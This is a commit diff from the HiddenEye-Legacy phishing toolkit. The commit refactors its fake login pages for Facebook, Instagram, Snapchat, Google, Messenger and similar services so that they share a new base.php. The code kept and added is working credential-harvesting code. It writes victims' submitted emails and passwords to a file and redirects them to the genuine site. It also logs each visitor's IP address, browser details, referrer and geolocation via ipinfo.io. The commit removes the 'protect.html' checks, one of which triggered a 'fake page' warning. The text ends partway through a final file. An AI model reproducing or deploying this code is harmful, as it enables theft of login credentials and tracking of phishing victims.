mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #36 from alexmozzhakov/login.php_refactorings
Login.php refactorings
This commit is contained in:
commit
7cb5d2168d
@ -71,7 +71,7 @@ def loadModule(module):
|
||||
[{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module
|
||||
|
||||
def runPhishing(social, option2):
|
||||
system('sudo rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/iplog.txt')
|
||||
system('sudo rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/iplog.txt && cp WebPages/base.php Server/www/')
|
||||
if option2 == '1' and social == 'Facebook':
|
||||
copy_tree("WebPages/fb_standard/", "Server/www/")
|
||||
if option2 == '2' and social == 'Facebook':
|
||||
|
@ -1,55 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://github.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://github.com');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
@ -1,54 +1,6 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://ig-liker.net/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://ig-liker.net/');
|
||||
exit();
|
||||
?>
|
||||
|
@ -1,55 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://instagram.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
header('Location: https://instagram.com');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://instagram.com');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>WELCOME TO FACEBOOK</title></html>
|
@ -1,14 +1,6 @@
|
||||
<?php
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://accounts.snapchat.com/accounts/login');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
||||
include 'base.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://accounts.snapchat.com/accounts/login');
|
||||
exit();
|
||||
|
37
WebPages/base.php
Normal file
37
WebPages/base.php
Normal file
@ -0,0 +1,37 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle) {
|
||||
$string = 'INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
. $QUERY_STRING . ' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
. $_SERVER['REMOTE_ADDR'] . ' [2]HOSTNAME = ' // ip address
|
||||
. $hostname . ' [3]BROWSER & SYSTEM = ' // hostname
|
||||
. $_SERVER['HTTP_USER_AGENT'] . ' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
. $_SERVER['HTTP_REFERER'] . ' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
. $details->loc . ' [6]ISP = ' // latitude, longitude
|
||||
. $details->org . ' [7]CITY = ' // internet service provider
|
||||
. $details->city . ' [8]STATE = ' // city
|
||||
. $details->region . ' [9]COUNTRY = ' // state
|
||||
. $details->country . ' [10]DATE & TIME = ' // country
|
||||
. date("D dS M,Y h:i a") . '________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
. "\n";
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
@ -1,54 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME TO FACEBOOK</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://mbasic.facebook.com/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
header('Location: https://mbasic.facebook.com/');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://mbasic.facebook.com/');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>WELCOME TO FACEBOOK</title></html>
|
@ -1,51 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://messenger.com/login.php');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://messenger.com/login.php');
|
||||
exit();
|
||||
?>
|
||||
|
@ -1,54 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME TO FACEBOOK</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://mbasic.facebook.com/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
header('Location: https://mbasic.facebook.com');
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://mbasic.facebook.com/');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>WELCOME TO FACEBOOK</title></html>
|
@ -1,42 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@$details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@$fileHandle = fopen($outputWebBug, "a");
|
||||
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string = 'INFORMATION_ACCESSED-------------------------------------------------------------------' . $QUERY_STRING . ' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
. $_SERVER['REMOTE_ADDR'] . ' [2]HOSTNAME = ' // ip address
|
||||
. $hostname . ' [3]BROWSER & SYSTEM = ' // hostname
|
||||
. $_SERVER['HTTP_USER_AGENT'] . ' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
. $_SERVER['HTTP_REFERER'] . ' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
. $details->loc . ' [6]ISP = ' // latitude, longitude
|
||||
. $details->org . ' [7]CITY = ' // internet service provider
|
||||
. $details->city . ' [8]STATE = ' // city
|
||||
. $details->region . ' [9]COUNTRY = ' // state
|
||||
. $details->country . ' [10]DATE & TIME = ' // country
|
||||
. date("D dS M,Y h:i a") . '________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
. "\n";
|
||||
$write = fputs($fileHandle, $string);
|
||||
@fclose($fileHandle);
|
||||
}
|
||||
include 'base.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://facebook.com/');
|
||||
exit();
|
||||
?>
|
||||
|
@ -1,55 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://google.com/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://google.com/');
|
||||
exit();
|
||||
?>
|
||||
|
||||
|
@ -1 +0,0 @@
|
||||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
@ -1,52 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
include 'base.php';
|
||||
|
||||
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://accounts.google.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://accounts.google.com');
|
||||
exit();
|
||||
?>
|
||||
|
@ -1,53 +1,6 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
include 'base.php';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
$var = $_POST['Email'];
|
||||
